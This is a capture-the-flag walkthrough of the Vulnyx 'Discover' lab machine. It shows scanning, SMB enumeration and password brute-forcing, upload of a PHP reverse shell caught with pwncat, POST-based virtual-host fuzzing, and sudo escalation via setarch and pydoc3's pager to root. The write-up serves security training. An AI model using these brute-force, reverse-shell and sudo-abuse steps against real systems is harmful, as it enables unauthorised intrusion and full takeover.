Vulnyx-Discover-Walkthrough
城南花已开

Information Gathering

Service Discovery

sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e3:f6:57 VMware, Inc.
192.168.60.232 08:00:27:8a:bf:4d PCS Systemtechnik GmbH
192.168.60.254 00:50:56:e1:d8:58 VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.052 seconds (124.76 hosts/sec). 4 responded
export ip=192.168.60.232
❯ rustscan -a $ip
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
I don't always scan ports, but when I do, I prefer RustScan.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.232:22
Open 192.168.60.232:80
Open 192.168.60.232:81
Open 192.168.60.232:139
Open 192.168.60.232:445
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-06 08:24 CST
Initiating ARP Ping Scan at 08:24
Scanning 192.168.60.232 [1 port]
Stats: 0:00:00 elapsed; 0 hosts completed (0 up), 1 undergoing ARP Ping Scan
ARP Ping Scan Timing: About 100.00% done; ETC: 08:24 (0:00:00 remaining)
Completed ARP Ping Scan at 08:24, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:24
Completed Parallel DNS resolution of 1 host. at 08:24, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 08:24
Scanning 192.168.60.232 [5 ports]
Discovered open port 81/tcp on 192.168.60.232
Discovered open port 80/tcp on 192.168.60.232
Discovered open port 445/tcp on 192.168.60.232
Discovered open port 22/tcp on 192.168.60.232
Discovered open port 139/tcp on 192.168.60.232
Completed SYN Stealth Scan at 08:24, 0.04s elapsed (5 total ports)
Nmap scan report for 192.168.60.232
Host is up, received arp-response (0.0017s latency).
Scanned at 2025-03-06 08:24:14 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
81/tcp open hosts2-ns syn-ack ttl 64
139/tcp open netbios-ssn syn-ack ttl 64
445/tcp open microsoft-ds syn-ack ttl 64
MAC Address: 08:00:27:8A:BF:4D (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.32 seconds
Raw packets sent: 6 (248B) | Rcvd: 6 (248B)

SMB (139/445) is open alongside SSH and two HTTP services on 80 and 81.

Start with port 80 and try enumerating directories.

Nothing of interest: the only hit is index.html, which just says Good!

❯ gobuster dir -u "http://$ip" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.232
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.6
[+] Extensions: txt,php,html,zip
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 15]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

SMB Brute Force

Enumerate the SMB service next.

A null session is allowed, and RID cycling turns up two local users: ken and takeshi.

❯ enum4linux -a $ip
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Mar 6 08:24:51 2025

=========================================( Target Information )=========================================

Target ........... 192.168.60.232
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


===========================( Enumerating Workgroup/Domain on 192.168.60.232 )===========================


[+] Got domain/workgroup name: WORKGROUP


===============================( Nbtstat Information for 192.168.60.232 )===============================

Looking up status of 192.168.60.232
DISCOVER <00> - B <ACTIVE> Workstation Service
DISCOVER <03> - B <ACTIVE> Messenger Service
DISCOVER <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections

MAC Address = 00-00-00-00-00-00

==================================( Session Check on 192.168.60.232 )==================================


[+] Server 192.168.60.232 allows sessions using username '', password ''


===============================( Getting domain SID for 192.168.60.232 )===============================

Domain Name: WORKGROUP
Domain Sid: (NULL SID)

[+] Can't determine if host is part of domain or part of a workgroup


==================================( OS information on 192.168.60.232 )==================================


[E] Can't get OS info with smbclient


[+] Got OS info for 192.168.60.232 from srvinfo:
DISCOVER Wk Sv PrQ Unx NT SNT Samba 4.13.13-Debian
platform_id : 500
os version : 6.1
server type : 0x809a03


======================================( Users on 192.168.60.232 )======================================

index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: ken Name: Desc:
index: 0x2 RID: 0x3e9 acb: 0x00000010 Account: takeshi Name: Desc:

user:[ken] rid:[0x3e8]
user:[takeshi] rid:[0x3e9]

================================( Share Enumeration on 192.168.60.232 )================================

smbXcli_negprot_smb1_done: No compatible protocol selected by server.

Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (Samba 4.13.13-Debian)
Reconnecting with SMB1 for workgroup listing.
Protocol negotiation to server 192.168.60.232 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 192.168.60.232

//192.168.60.232/print$ Mapping: DENIED Listing: N/A Writing: N/A

[E] Can't understand response:

NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
//192.168.60.232/IPC$ Mapping: N/A Listing: N/A Writing: N/A

===========================( Password Policy Information for 192.168.60.232 )===========================



[+] Attaching to 192.168.60.232 using a NULL share

[+] Trying protocol 139/SMB...

[+] Found domain(s):

[+] DISCOVER
[+] Builtin

[+] Password Info for Domain: DISCOVER

[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: 37 days 6 hours 21 minutes
[+] Password Complexity Flags: 000000

[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0

[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: 37 days 6 hours 21 minutes



[+] Retieved partial password policy with rpcclient:


Password Complexity: Disabled
Minimum Password Length: 5


======================================( Groups on 192.168.60.232 )======================================


[+] Getting builtin groups:


[+] Getting builtin group memberships:


[+] Getting local groups:


[+] Getting local group memberships:


[+] Getting domain groups:


[+] Getting domain group memberships:


=================( Users on 192.168.60.232 via RID cycling (RIDS: 500-550,1000-1050) )=================


[I] Found new SID:
S-1-22-1

[I] Found new SID:
S-1-5-32

[I] Found new SID:
S-1-5-32

[I] Found new SID:
S-1-5-32

[I] Found new SID:
S-1-5-32

[+] Enumerating users using SID S-1-5-32 and logon username '', password ''

S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''

S-1-22-1-1000 Unix User\ken (Local User)
S-1-22-1-1001 Unix User\takeshi (Local User)

[+] Enumerating users using SID S-1-5-21-4197875319-946574990-1670565427 and logon username '', password ''

S-1-5-21-4197875319-946574990-1670565427-501 DISCOVER\nobody (Local User)
S-1-5-21-4197875319-946574990-1670565427-513 DISCOVER\None (Domain Group)
S-1-5-21-4197875319-946574990-1670565427-1000 DISCOVER\ken (Local User)
S-1-5-21-4197875319-946574990-1670565427-1001 DISCOVER\takeshi (Local User)

==============================( Getting printer info for 192.168.60.232 )==============================

No printers returned.


enum4linux complete on Thu Mar 6 08:25:06 2025

There is no further information, so the remaining option is to brute-force the SMB accounts. The policy dump above shows Account Lockout Threshold: None, so online guessing will not lock ken or takeshi out; on a real target, check that before spraying.

It turns out hydra's smb module only speaks SMBv1, which this Samba server has disabled (hydra reports that the target "does not support SMBv1"). Hydra builds with libsmbclient also ship an smb2 module, but here the Metasploit module is used instead.

❯ hydra -l ken -P /usr/share/wordlists/rockyou.txt smb://$ip -I
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-06 08:50:08
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 1 task per 1 server, overall 1 task, 14344399 login tries (l:1/p:14344399), ~14344399 tries per task
[DATA] attacking smb://192.168.60.232:445/
[ERROR] target smb://192.168.60.232:445/ does not support SMBv1

Brute-force with the msfconsole smb_login module instead. Note that the module runs at most one thread per host (see the THREADS description below), so setting THREADS to 100 against a single target changes nothing.

This yields the SMB credentials ken:kenken.

❯ msfconsole
Metasploit tip: You can pivot connections over sessions started with the
ssh_login modules



=[ metasploit v6.4.38-dev ]
+ -- --=[ 2467 exploits - 1273 auxiliary - 431 post ]
+ -- --=[ 1478 payloads - 49 encoders - 13 nops ]
+ -- --=[ 9 evasion ]

Metasploit Documentation: https://docs.metasploit.com/

msf6 > search smb_login

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/smb/smb_login . normal No SMB Login Check Scanner


Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/smb/smb_login

msf6 > use 0
[*] New in Metasploit 6.4 - The CreateSession option within this module can open an interactive session
msf6 auxiliary(scanner/smb/smb_login) > show options

Module options (auxiliary/scanner/smb/smb_login):

Name Current Setting Required Description
---- --------------- -------- -----------
ABORT_ON_LOCKOUT false yes Abort the run when an account lockout is detected
ANONYMOUS_LOGIN false yes Attempt to login with a blank username and password
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
CreateSession false no Create a new session for every successful login
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DB_SKIP_EXISTING none no Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
DETECT_ANY_AUTH false no Enable detection of systems accepting any authentication
DETECT_ANY_DOMAIN false no Detect if domain is required for the specified user
PASS_FILE no File containing passwords, one per line
PRESERVE_DOMAINS true no Respect a username that contains a domain name.
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RECORD_GUEST false no Record guest-privileged random logins to the database
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/smb/smb_login) > set SMBUser ken
SMBUser => ken
msf6 auxiliary(scanner/smb/smb_login) > set PASS_FILE /usr/share/wordlists/rockyou.txt
PASS_FILE => /usr/share/wordlists/rockyou.txt
msf6 auxiliary(scanner/smb/smb_login) > set THREADS 100
THREADS => 100
msf6 auxiliary(scanner/smb/smb_login) > set RHOSTS 192.168.60.232
RHOSTS => 192.168.60.232
msf6 auxiliary(scanner/smb/smb_login) > exploit

…… (output omitted) ……
[+] 192.168.60.232:445 - 192.168.60.232:445 - Success: '.\ken:kenken'

Connect with smbclient.

❯ smbclient -U ken  -L //$ip
Password for [WORKGROUP\ken]:

Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (Samba 4.13.13-Debian)
ken Disk File Upload Path
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
Protocol negotiation to server 192.168.60.232 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available
❯ smbclient -U ken //$ip/ken
Password for [WORKGROUP\ken]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Tue Jul 4 22:47:53 2023
.. D 0 Tue Jul 4 05:19:50 2023
index.html N 15 Tue Jul 4 18:33:20 2023

7173040 blocks of size 1024. 4558828 blocks available
smb: \> get index.html
getting file \index.html of size 15 as index.html (2.4 KiloBytes/sec) (average 2.4 KiloBytes/sec)
smb: \>

ken's share (commented "File Upload Path") contains an index.html.

Downloaded and viewed locally, it is the same 15-byte page served on port 80.

cat index.html
<h2>Good!</h2>

So let's upload a PHP reverse shell to the share.

smb: \> put php-reverse-shell.php
putting file php-reverse-shell.php as \php-reverse-shell.php (1341.8 kb/s) (average 490.7 kb/s)

However, port 80 does not execute the file: it is returned as plain text. The share appears to be a web root (the same index.html is served on port 80), but this virtual host does not hand .php files to PHP.

Subdomain Enumeration

Looking at another writeup, /under_construction turns up on port 81.

I had been filtering out 403 responses all along, which is why it never showed up; and since 403 means access is refused, finding it on its own would not have helped much. A 403 is still worth recording, though: the path exists, and a different method or Host header may turn it into a 200.

❯ gobuster dir -u "http://$ip:81" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,zip,txt -b 404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.232:81
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: zip,txt,php,html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================

/index.html (Status: 200) [Size: 15]
/under_construction (Status: 403) [Size: 279]
Progress: 243098 / 1102800 (22.04%)
===============================================================
Finished
===============================================================

On this box, however, a POST request to the same path returns content.

This reveals a domain: todiscover.nyx.

❯ curl http://192.168.60.232:81/under_construction/ -X POST
<!DOCTYPE html>
<html>
<head>
<title>Under Construction</title>
…… (omitted) ……
</style>
</head>
<body>
<div class="container">
<div>
<h1>Under Construction</h1>
<p>We are working to improve our website.</p>
<p>contact: [email protected]</p>
</div>
</div>
</body>
</html>

Add the domain to /etc/hosts.

Next, fuzz for subdomains (virtual hosts).

Because a normal GET to todiscover.nyx returns 403, the fuzzer needs -X POST as well.

Point the fuzzer at the file we uploaded over SMB earlier: a virtual host that serves ken's share (and executes PHP) will respond differently from the rest.

❯ wfuzz -c -X POST -u "http://todiscover.nyx/php-reverse-shell.php" -H "HOST:FUZZ.todiscover.nyx" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --hw 11
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://todiscover.nyx/php-reverse-shell.php
Total requests: 114441

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000015484: 200 2 L 14 W 92 Ch "smbc - smbc"

Total time: 71.72552
Processed Requests: 114441
Filtered Requests: 114440
Requests/sec.: 1595.540

The subdomain smbc.todiscover.nyx exists.

Add it to /etc/hosts as well.

Then curl the reverse shell: under this virtual host, PHP files are executed.
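The two discoveries above, the method-dependent 403 and the Host-header fuzz, can be reproduced offline. The following Python script is an added example, not code from the original writeup or from the box: a small local HTTP server stands in for port 81, answering 403 to every GET (the box returned 403 to GET; that the rule applies to all virtual hosts is an assumption made here) and dispatching POST requests by Host header. The fuzzer then does what the wfuzz command does: it POSTs the same path with each candidate Host and drops responses whose word count matches a baseline, which is the --hw filter. The wordlist, the probe path's response bodies and the hidden vhost name are constructed for the demo.

```python
"""Method-aware virtual-host fuzzing, reproduced against a local stand-in.

Added example; the server below imitates the observed behaviour of port 81
and is not the real target.
"""
import http.client
import http.server
import threading

BASE_DOMAIN = "todiscover.nyx"
HIDDEN_VHOST = "smbc"                 # the vhost the real fuzz run found
PROBE_PATH = "/php-reverse-shell.php"
# Constructed mini wordlist standing in for subdomains-top1million-110000.txt
WORDLIST = ["www", "mail", "dev", "smbc", "ftp", "test"]

FORBIDDEN = "<h1>Forbidden</h1><p>You don't have permission to access this resource.</p>"
UNDER_CONSTRUCTION = "<h1>Under Construction</h1><p>We are working to improve our website.</p>"
PHP_OUTPUT = "<h2>smbc vhost: PHP executed</h2>"   # constructed stand-in body


class FakeVhostHandler(http.server.BaseHTTPRequestHandler):
    """Stand-in for the target web server (constructed, not the real box)."""

    def log_message(self, *args):  # silence per-request logging
        pass

    def _host(self):
        return self.headers.get("Host", "").split(":")[0].lower()

    def _reply(self, status, body):
        data = body.encode()
        self.send_response(status)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def do_GET(self):
        # Assumed server-wide rule: GET is refused everywhere, so GET-based
        # fuzzing sees the same 403 page for every Host and learns nothing.
        self._reply(403, FORBIDDEN)

    def do_POST(self):
        # Only the hidden vhost maps to ken's share and executes PHP.
        if self._host() == f"{HIDDEN_VHOST}.{BASE_DOMAIN}":
            self._reply(200, PHP_OUTPUT)
        else:
            self._reply(200, UNDER_CONSTRUCTION)


def fetch(port, host_header, path, method):
    """Send one request to the local stand-in with an arbitrary Host header."""
    conn = http.client.HTTPConnection("127.0.0.1", port, timeout=5)
    conn.request(method, path, headers={"Host": host_header})
    resp = conn.getresponse()
    body = resp.read().decode(errors="replace")
    conn.close()
    return resp.status, body


def fuzz_vhosts(port, path, method, words, base=BASE_DOMAIN):
    """Return (word, status, word_count) for each Host whose response differs
    from a non-existent-vhost baseline, compared by word count (wfuzz --hw)."""
    _, baseline = fetch(port, f"does-not-exist.{base}", path, method)
    hide_words = len(baseline.split())
    hits = []
    for word in words:
        status, body = fetch(port, f"{word}.{base}", path, method)
        if len(body.split()) != hide_words:
            hits.append((word, status, len(body.split())))
    return hits


def run_demo():
    """Fuzz the stand-in with GET and with POST; only POST reveals the vhost."""
    server = http.server.ThreadingHTTPServer(("127.0.0.1", 0), FakeVhostHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    port = server.server_address[1]
    try:
        get_hits = fuzz_vhosts(port, PROBE_PATH, "GET", WORDLIST)
        post_hits = fuzz_vhosts(port, PROBE_PATH, "POST", WORDLIST)
    finally:
        server.shutdown()
        server.server_close()
    return get_hits, post_hits


if __name__ == "__main__":
    get_hits, post_hits = run_demo()
    print("GET  hits:", get_hits)    # empty: every Host gets the same 403
    print("POST hits:", post_hits)   # [('smbc', 200, 4)]
```

The GET pass returns nothing because a blanket 403 makes every virtual host look identical; the same wordlist with POST singles out the one Host whose response body differs. The lesson carries over to real targets: when a path answers 403 to GET, repeat the directory and vhost fuzzing with other methods before concluding it is dead.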

User Privilege Escalation

Start a listener and grab the user flag first.

❯ pwncat-cs -lp 4444
[09:24:09] Welcome to pwncat 🐈! __main__.py:164
bound to 0.0.0.0:4444 ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[09:25:38] received connection from bind.py:84
192.168.60.232:60458
[09:25:38] 0.0.0.0:4444: upgrading from manager.py:957
/usr/bin/dash to /usr/bin/bash
[09:25:39] 192.168.60.232:60458: registered manager.py:957
new host w/ db
(local) pwncat$
(remote) ken@discover:/$ cd ~
(remote) ken@discover:/home/ken$ cat user.txt
6250095210f0c82aea6330a1269f8d97

User ken may run setarch as takeshi via sudo without a password.

setarch simply executes the given program under a chosen personality, so passing /bin/bash escalates to takeshi.

Root Privilege Escalation

takeshi in turn may run pydoc3 as root via sudo.

(remote) ken@discover:/home/ken$ sudo -l
Matching Defaults entries for ken on discover:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User ken may run the following commands on discover:
(takeshi) NOPASSWD: /usr/bin/setarch
(remote) ken@discover:/home/ken$ sudo -u takeshi /usr/bin/setarch $(arch) /bin/bash
takeshi@discover:/home/ken$ sudo -l
Matching Defaults entries for takeshi on discover:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User takeshi may run the following commands on discover:
(root) NOPASSWD: /usr/bin/pydoc3

A quick look at how pydoc3 behaves:

Viewing a topic, pydoc3 <topic>, pipes the documentation through a pager; sudo's env_reset does not preserve PAGER, so pydoc falls back to less when it is on the PATH. From less, !/bin/bash spawns a shell as root. (The -k option is a keyword search that prints to stdout without a pager. In the session below the first argument is the bare word k, which pydoc treats as a topic and cannot find; the second argument, socket, is what opens less.)

Keyword search: pydoc3 -k <keyword> searches the synopsis lines of all available modules for the keyword.

Start the HTTP server:

  • On a given hostname: pydoc3 -n <hostname>
  • On a given port: pydoc3 -p <port>
  • On an arbitrary port, opening a browser: pydoc3 -b
takeshi@discover:/tmp$ sudo /usr/bin/pydoc3 k socket
No Python documentation found for 'k'.
Use help() to get the interactive help utility.
Use help(str) for help on the str class.

root@discover:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@discover:/tmp# cat /root/root.txt
d1fbb1fc68df7c8bdb6160ef34015ad1